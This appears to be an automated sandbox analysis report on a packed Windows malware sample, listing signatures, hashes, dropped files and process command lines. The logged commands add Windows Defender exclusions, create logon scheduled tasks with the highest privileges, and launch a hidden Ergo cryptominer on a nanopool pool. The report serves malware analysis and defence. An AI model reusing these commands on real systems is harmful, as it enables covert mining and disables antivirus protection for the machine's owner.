Analysis Overview
SHA256
05346140fbd935a2bd11cdb627178453624d5c2556ce5d253bd1a35095eaf0c9
Threat Level: Shows suspicious behavior
The file af9721f9690603beffdb08ccb2b8196a was found to show suspicious behavior.
Malicious Activity Summary
VMProtect packed file
Executes dropped EXE
Loads dropped DLL
Drops file in Windows directory
Unsigned PE
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-22 13:51
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-22 13:51
Reported
2023-12-23 20:32
Platform
win10v2004-20231215-en
Max time kernel
1s
Max time network
101s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs net.exe
Processes
C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe
"C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
"C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\Winteste.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\WindowsUpdaters.vbs"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 FILE
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0
C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe
"C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /XML C:\Windows\winserver.xml /tn winserver
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\WNDR.bat" "
C:\Windows\SysWOW64\net.exe
NET FILE
C:\Windows\WindowsNote.exe
"C:\Windows\WindowsNote.exe"
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\services64.exe
"C:\Windows\system32\services64.exe"
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 2
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 3
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 4
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 5
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 6
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 7
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 8
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 9
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 10
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 11
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 12
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 2.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
| MD5 | 66c26c027e47f7a9fe48fff9eb4b67c9 |
| SHA1 | 1dd6d7c9090d48021bc101c758f7845452273ce8 |
| SHA256 | 4366010a70d68b7327f69389b7739b0f82015d2412ae79637d1e386e27ca066a |
| SHA512 | 416d121363ad9162cb69349832b5d896ef751c19c74d39bb1cebf8d99323f72fe4c7db9a145746bb5b37a0cf6aa26edb9be8b5878d3e065c35dd01f2096d2b12 |
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
| MD5 | cff0d76dd193f340ea381cde76627072 |
| SHA1 | 9e5e58a3877f9cf3e441b3104e2cb7b8e8f2e1dd |
| SHA256 | a481487cf572da8b2cd08bb8686e359a5ba1177730cae5d19e5f95db5fcb79c0 |
| SHA512 | dc826b904bc251dcd1319d1a923b942812ab863e10fe7337fdc4fa6d5b5eb8ca5f66c512460883578562bf647d8d89505c71fcf8156cc2d64f0246a1294a76ad |
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\Winteste.bat
| MD5 | f88ec3f41e6a0bec16c8233002d9cedd |
| SHA1 | cc481e1ada898780077d3b048cad545f43624b92 |
| SHA256 | 310ff49f6a041d5a1fb93460afc21ef1cd7ee80675053953566072422f10367e |
| SHA512 | 9abb41ce50001957c0e5339a3aa703255ce13235e304eb355d320001674b2850c4f8f09c3721d5f7a077b2e12bcc23c588fa88248704987eada6eea633179bad |
C:\Windows\WindowsNote.exe
| MD5 | e0cff336d52bb06820e03c5542097518 |
| SHA1 | 91194679e106c55225c436be8bf3d9bfb7aff42a |
| SHA256 | 01f07014eb271777d582ed989ab32058194340c3e24f7d7884b2eecf54bca36d |
| SHA512 | cfd54560ea82a440d7627fd344835d24594b36c55da3ca70493d60c1b7a697fa4ab60a9ddf0271ce756696a4b541dfead8a108f30581d44393c18048280ce9a0 |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-22 13:51
Reported
2023-12-23 20:32
Platform
win7-20231215-en
Max time kernel
1s
Max time network
121s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\choice.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Winteste.bat | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\__tmp_rar_sfx_access_check_259395092 | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\WNDR.bat | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\WindowsUpdaters.vbs | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\Windows.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\WindowsNote.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\WindowsNote.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\WNDR.bat | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\winserver.xml | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\Windows.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\Winteste.bat | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\WindowsUpdaters.vbs | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\winserver.xml | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs net.exe
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2508 wrote to memory of 3024 | N/A | C:\Windows\system32\choice.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe |
| PID 2508 wrote to memory of 3024 | N/A | C:\Windows\system32\choice.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe |
| PID 2508 wrote to memory of 3024 | N/A | C:\Windows\system32\choice.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe |
| PID 2508 wrote to memory of 3024 | N/A | C:\Windows\system32\choice.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe
"C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 FILE
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0
C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe
"C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /XML C:\Windows\winserver.xml /tn winserver
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\WNDR.bat" "
C:\Windows\SysWOW64\net.exe
NET FILE
C:\Windows\WindowsNote.exe
"C:\Windows\WindowsNote.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\WindowsUpdaters.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\Winteste.bat" "
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
"C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 1
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\services64.exe
"C:\Windows\system32\services64.exe"
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 2
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 3
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 4
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 5
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 6
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 7
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 8
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 9
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 10
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 11
Network
Files